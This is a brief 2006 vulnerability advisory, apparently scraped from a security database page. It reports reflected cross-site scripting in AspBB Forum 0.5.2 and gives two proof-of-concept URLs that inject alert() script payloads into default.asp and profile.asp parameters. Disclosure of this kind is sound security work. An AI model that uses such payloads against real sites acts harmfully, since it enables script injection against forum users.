Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12725
HistoryMay 19, 2006 - 12:00 a.m.

AspBB Forum "profile.asp & default.asp" XSS Vulnerability

2006-05-1900:00:00
vulners.com
7

This xss works on Aspbb Forums

Homapage : http://www.aspbb.org

Version : 0.5.2

Exploit:

http://www.example.com/default.asp?action="><script>alert('Xss
Vulnerability');</script>

http://www.example.com/profila.asp?get=&quot;&gt;&lt;script&gt;alert&#40;&#39;Xss
Vulnerability');</script>&URL=%2FDefault%2Easp%3F

TeufeL // Netkabus.Com Research And Develop Group


Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr